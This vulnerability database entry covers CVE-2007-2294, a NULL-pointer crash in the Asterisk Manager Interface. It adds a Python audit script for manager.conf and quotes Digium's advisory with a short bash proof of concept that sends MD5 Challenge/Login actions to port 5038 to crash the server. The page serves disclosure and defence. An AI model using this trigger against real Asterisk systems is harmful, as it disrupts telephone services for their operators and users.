Asterisk Manager Interface Remote Denial of Service Vulnerability

Vulnerability ID: 1190804    Vulnerability type: Other
Published: 2007-04-25    Updated: 2007-08-28
CVE ID: CVE-2007-2294    CNNVD-ID: CNNVD-200704-561
Platform: N/A    CVSS score: 7.8
|Vulnerability source
https://www.securityfocus.com/bid/23649
https://cxsecurity.com/issue/WLB-2007040153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-561
|Vulnerability details
Asterisk is PBX software that runs on Linux and supports IP telephony over the SIP, IAX and H.323 protocols. The implementation of Asterisk's manager interface contains a remote denial-of-service vulnerability that a remote attacker can use to crash the program. If a manager user is configured in manager.conf without a password, then when a client attempts to connect with that username and MD5 authentication, Asterisk dereferences a NULL pointer and crashes.
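An added configuration check for the precondition described above (example code written for this page, not from Digium or the Asterisk project). It parses a manager.conf in the standard Asterisk layout, where the `enabled` key under `[general]` turns the manager interface on and each user section's `secret` key holds the password, and reports any manager user that has no secret while the interface is enabled, which is exactly the combination the advisory's resolution tells administrators to remove. The configuration embedded in the block is constructed for the example; the key names are Asterisk's, the audit logic and the conservative treatment of an empty `secret` as missing are choices made here.

```python
import re

# Constructed sample manager.conf for this example (not from the advisory).
SAMPLE_MANAGER_CONF = """\
[general]
enabled = yes          ; AMI listener on (the advisory notes it is off by default)
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = placeholder-secret
read = system,call
write = system,call

[monitor]
; no secret at all: the precondition the advisory describes
read = call

[testuser]
secret =               ; present but empty; treated as missing below
read = call
"""


def parse_manager_conf(text):
    """Minimal parser for Asterisk's INI-style config files.

    Returns {section_name: {key: value}}. ';' starts a comment, keys are
    separated from values by '=' or '=>', and a section declared twice
    merges its keys into one dict.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        header = re.match(r"^\[([^\]]+)\]", line)
        if header:
            current = header.group(1).strip()
            sections.setdefault(current, {})
            continue
        if current is None:
            continue                             # key before any section: ignore
        key, sep, value = line.partition("=")
        if not sep:
            continue                             # not a key/value line
        sections[current][key.strip()] = value.lstrip(">").strip()
    return sections


def is_truthy(value):
    """Asterisk accepts yes/true/on/1 for boolean options."""
    return value.strip().lower() in {"yes", "true", "on", "1"}


def audit_manager_conf(text):
    """Report whether this manager.conf satisfies the crash precondition.

    'exposed' is True only when the AMI listener is enabled *and* at least one
    manager user has no (or an empty) secret. An empty secret is flagged as a
    conservative choice made for this example.
    """
    sections = parse_manager_conf(text)
    general = sections.get("general", {})
    enabled = is_truthy(general.get("enabled", "no"))   # off unless configured
    port = int(general.get("port", "5038"))             # AMI's default port

    users_without_secret = sorted(
        name for name, keys in sections.items()
        if name != "general" and not keys.get("secret", "").strip()
    )
    return {
        "enabled": enabled,
        "port": port,
        "users_without_secret": users_without_secret,
        "exposed": enabled and bool(users_without_secret),
    }


if __name__ == "__main__":
    result = audit_manager_conf(SAMPLE_MANAGER_CONF)
    print(f"AMI enabled: {result['enabled']} (port {result['port']})")
    for user in result["users_without_secret"]:
        print(f"  manager user [{user}] has no secret")
    print("EXPOSED to the CVE-2007-2294 precondition" if result["exposed"] else "OK")
```

Run against a real /etc/asterisk/manager.conf by reading the file into `audit_manager_conf`; a result with `exposed` set means the installation matches the advisory's crash conditions regardless of whether it has been upgraded, and the listed users should be given a secret or removed.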
|Vulnerability EXP
>                Asterisk Project Security Advisory - ASA-2007-012
> 
>    +------------------------------------------------------------------------+
>    |       Product       | Asterisk                                         |
>    |---------------------+--------------------------------------------------|
>    |       Summary       | Remote Crash Vulnerability in Manager Interface  |
>    |---------------------+--------------------------------------------------|
>    | Nature of Advisory  | Denial of Service                                |
>    |---------------------+--------------------------------------------------|
>    |   Susceptibility    | Remote Unauthenticated Sessions                  |
>    |---------------------+--------------------------------------------------|
>    |      Severity       | Moderate                                         |
>    |---------------------+--------------------------------------------------|
>    |   Exploits Known    | Yes                                              |
>    |---------------------+--------------------------------------------------|
>    |     Reported On     | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |     Reported By     | Digium Technical Support                         |
>    |---------------------+--------------------------------------------------|
>    |      Posted On      | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |   Last Updated On   | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |  Advisory Contact   | russell (at) digium (dot) com                    |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Description | The Asterisk Manager Interface has a remote crash        |
>    |             | vulnerability. If a manager user is configured in        |
>    |             | manager.conf without a password, and then a connection   |
>    |             | is made that attempts to use that username and MD5       |
>    |             | authentication, Asterisk will dereference a NULL pointer |
>    |             | and crash.                                               |
>    |             |                                                          |
>    |             | This example script shows how the crash can be           |
>    |             | triggered:                                               |
>    |             |                                                          |
>    |             | #!/bin/bash                                              |
>    |             |                                                          |
>    |             | function text1() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Challenge                                        |
>    |             |                                                          |
>    |             | actionid: 0#                                             |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | function text2() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Login                                            |
>    |             |                                                          |
>    |             | actionid: 1#                                             |
>    |             |                                                          |
>    |             | key: textstringhere                                      |
>    |             |                                                          |
>    |             | username: testuser                                       |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1     |
>    |             | 5038                                                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | The manager interface is not enabled by default. If it is |
>    |            | enabled, the only way this crash can be exploited is if a |
>    |            | user exists in manager.conf without a password. Given the |
>    |            | conditions necessary for this problem to be exploited,    |
>    |            | the severity of this issue is marked as 'moderate'.       |
>    |            |                                                           |
>    |            | All users of the Asterisk manager interface in affected   |
>    |            | versions should ensure that there are no accounts in      |
>    |            | manager.conf. Alternatively, the issue can be avoided by  |
>    |            | completely disabling the manager interface.               |
>    |            |                                                           |
>    |            | Users of the manager interface are encouraged to update   |
>    |            | to the appropriate version of their Asterisk product      |
>    |            | listed in the 'Corrected In' section below.               |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | All versions              |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | All versions prior to     |
>    |                              |             | 1.2.18                    |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | All versions prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | All versions              |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | All versions up to and    |
>    |                              |             | including B.1.3           |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | All versions up to and    |
>    |                              |             | including Beta5           |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | All versions prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product      |                      Release                       |
>    |-------------------+----------------------------------------------------|
>    |   Asterisk Open   |          1.2.18 and 1.4.3, available from          |
>    |      Source       |    ftp://ftp.digium.com/pub/telephony/asterisk     |
>    |-------------------+----------------------------------------------------|
>    | Asterisk Business |   B.1.3.3, available from the Asterisk Business    |
>    |      Edition      |  Edition user portal on http://www.digium.com or   |
>    |                   |            via Digium Technical Support            |
>    |-------------------+----------------------------------------------------|
>    |    AsteriskNOW    |             Beta6, when available from             |
>    |                   |   http://www.asterisknow.org/. Beta5 can use the   |
>    |                   |   system update feature in the appliance control   |
>    |                   |                       panel.                       |
>    |-------------------+----------------------------------------------------|
>    |     Asterisk      |               0.4.0, available from                |
>    |     Appliance     |      ftp://ftp.digium.com/pub/telephony/aadk/      |
>    |   Developer Kit   |                                                    |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links        |                                                  |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-012.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-012
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.
|Affected products
SuSE Linux 10.1, Debian Linux 3.1 sparc, Debian Linux 3.1 s/390, Debian Linux 3.1 ppc, Debian Linux 3.1 mipsel, Debian Linux 3.1 mips, Debian Linux 3.1 m68k
|References

Source: SECUNIA
Name: 24977
Link: http://secunia.com/advisories/24977
Source: SECTRACK
Name: 1017955
Link: http://www.securitytracker.com/id?1017955
Source: BUGTRAQ
Name: 20070425 ASA-2007-012: Remote Crash Vulnerability in Manager Interface
Link: http://www.securityfocus.com/archive/1/archive/1/466911/100/0/threaded
Source: www.asterisk.org
Link: http://www.asterisk.org/files/ASA-2007-012.pdf
Source: XF
Name: asterisk-interface-dos(33886)
Link: http://xforce.iss.net/xforce/xfdb/33886
Source: BID
Name: 23649
Link: http://www.securityfocus.com/bid/23649
Source: OSVDB
Name: 35369
Link: http://www.osvdb.org/35369
Source: SUSE
Name: SUSE-SA:2007:034
Link: http://www.novell.com/linux/security/advisories/2007_34_asterisk.html
Source: VUPEN
Name: ADV-2007-1534
Link: http://www.frsirt.com/english/advisories/2007/1534
Source: DEBIAN
Name: DSA-1358
Link: http://www.debian.org/security/2007/dsa-1358
Source: SREASON
Name: 2646
Link: http://securityreason.com/securityalert/2646
Source: SECUNIA
Name: 25582
Link: http://secunia.com/advisories/25582